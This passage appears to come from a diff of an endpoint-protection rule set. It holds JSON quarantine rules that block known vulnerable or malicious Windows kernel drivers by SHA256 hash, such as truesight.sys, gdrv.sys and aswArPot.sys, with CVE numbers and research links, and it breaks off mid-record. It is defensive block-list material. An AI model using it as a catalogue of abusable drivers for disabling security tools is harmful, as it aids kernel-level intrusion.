"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830535Z", + "creation_date": "2026-03-23T11:45:31.830537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e100aa891445f18f4805dced7c4055aa5bee6c65995daa42a438349ccad6c3c", + "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22e0a162-a400-5bc5-9624-da03f676d009", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471685Z", + "creation_date": "2026-03-23T11:45:31.471688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471698Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e891e1acc02731e93da39f46bf24cbae1a30f1bcf4764ad7cf3b9eecdfc10c1f", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22e1d574-d320-5ffb-86c5-7ef7063f7ecc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143411Z", + "creation_date": "2026-03-23T11:45:32.143413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b49b7bcf44242dac00ca559dca217ec5d935b78c963f23bd0f49f53a610dd569", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://www.loldrivers.io/drivers/fded7e63-0470-40fe-97ed-aa83fd027bad/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22e23e38-782f-5fb1-8d38-e45909c292ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.982642Z", + "creation_date": "2026-03-23T11:45:29.982644Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982650Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3", + "comment": "Malicious Kernel Driver (aka wantd_5.sys) [https://www.loldrivers.io/drivers/3277cecc-f4b4-4a00-be01-9da83e013bcd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22e473ce-86c1-5bfe-8024-32d659f2dba2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609447Z", + "creation_date": "2026-03-23T11:45:29.609449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1bd6a40e294f4f74f9baf172f5a3e21dad3b7e31b5757d91bda309bd54a72fbe", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22e4c173-9e10-577c-99d7-25de69970f76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819106Z", + "creation_date": "2026-03-23T11:45:30.819108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "058afe9e93dcc52e64fc0942b80a159b8617608c15462a7a17984de3cc0b8d04", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22eac28d-8c9c-5022-8da7-52da7eca3403", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829429Z", + "creation_date": "2026-03-23T11:45:30.829431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47aadda1c6ccb26783e1bdd85623c62fe96a176bdfc57dfa48be41d23bfa9fbc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22f69a9a-b3d0-5ab5-9c60-b469b8eb714f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833037Z", + "creation_date": "2026-03-23T11:45:30.833041Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60c22d313b7a2205957bd713870b8c92c63aef6ca68f408d8a6b4986defe5288", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22fd6278-76cf-5ddf-b162-e1eb551b21e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613684Z", + "creation_date": "2026-03-23T11:45:29.613686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22fff223-e55b-55d8-a96e-11a065670946", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487414Z", + "creation_date": "2026-03-23T11:45:31.487416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "09415d7d05fe9fd822bd538519e87285ce96bb25bd74e5f5f3e479c2ad575090", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23077d69-5079-5c66-bd1d-a39653d84e63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834080Z", + "creation_date": "2026-03-23T11:45:30.834083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a73aaeb11ac9af921949053a51f15a1247d0d4d9b55ff95c9120e84c4d4d7e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2311adfd-84be-50a9-a31f-48a910f32711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807389Z", + "creation_date": "2026-03-23T11:45:31.807392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c2d6db4ea006fce9886dc66103394b47653f5cf2517556d179f3eb10d9687f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "232760da-2173-585e-85fe-288a05c92a71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620964Z", + "creation_date": "2026-03-23T11:45:29.620966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620972Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f", + "comment": "Phoenix Technologies Vulnerable Physmem 
drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "233e24d6-f1a2-5470-a8fd-37ab66a0bb5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968927Z", + "creation_date": "2026-03-23T11:45:29.968929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bd41a29cbba0d24e639f49d1f201b9bd119b11f5e3b8a5fefa3a5c6f1e7692c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2341efe9-9c27-5866-91ba-de14a436f405", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480751Z", + "creation_date": 
"2026-03-23T11:45:30.480753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd0bd7b8fae8e8835ba09118a02a06a51e111fccbe16916414844aab91cfeed4", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23421092-b421-5be8-be73-bfcbaf552875", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142844Z", + "creation_date": "2026-03-23T11:45:31.142846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0e1c390cd80d8e1e8552939d21f6710d21cca77a27ca7e393832ef5cf456bf7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "234f9fed-975e-5f7f-a788-c46d366b7904", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811008Z", + "creation_date": "2026-03-23T11:45:31.811010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ae7bc61efe7325bcf37099ad877ea20abcc381d9d05492146c5e2764b11622a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "235cb634-b380-58d5-b14e-b9d9b3181f4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153093Z", + "creation_date": "2026-03-23T11:45:31.153096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.153104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "879d4047295e37b3d185906588e0b7716097b45340e5244809cf0146599b9a6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2365317d-1fbd-5069-af40-154f2bfdd34d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820284Z", + "creation_date": "2026-03-23T11:45:30.820286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba182292c25044e9abc89bcd2a846a4cd74485ce0c26413e5a859c516f9d89e2", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23715b8f-5e47-5729-8d93-1ae5aed6fe32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819625Z", + "creation_date": "2026-03-23T11:45:31.819628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7833b719290b7a877b1ac54d2734037c92c2bf1d4ec5f62beb213b16fd1d4ab4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2377b464-487c-5009-b34f-30ca02bdaf6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493994Z", + "creation_date": "2026-03-23T11:45:31.493998Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "a0c7f5abba359cd1db92da1eb19a5d269da2de0260f9687338071ebec00f2da5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2387bba0-4721-50bb-8240-323f484621c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617378Z", + "creation_date": "2026-03-23T11:45:29.617380Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61580186311f6260c6de7fa5bf9242d74687aa1c5c9fdf9d9a48eb46d67d636f", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2388a1a0-2a65-5ac6-be3d-66d738f75860", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152668Z", + "creation_date": "2026-03-23T11:45:31.152670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90e33eefb9c906e9930162b84a653a2503241956751184a94ab94d39f36516a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "238e85b6-8c23-5781-a4a3-1692ebed5369", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455959Z", + "creation_date": "2026-03-23T11:45:30.455963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455972Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "742b102cc69403c669244f0efcf9ac8e5bbdb9b10f35f03c743651afe5ac32ba", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) 
[https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "238f9798-ecfe-5f5e-884c-34ebb284f9ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499108Z", + "creation_date": "2026-03-23T11:45:31.499111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d69c4a3d8bd38413868d5bd5d6d134b5e99f892c74ef61616498be8e7679a9f7", + "comment": "Vulnerable 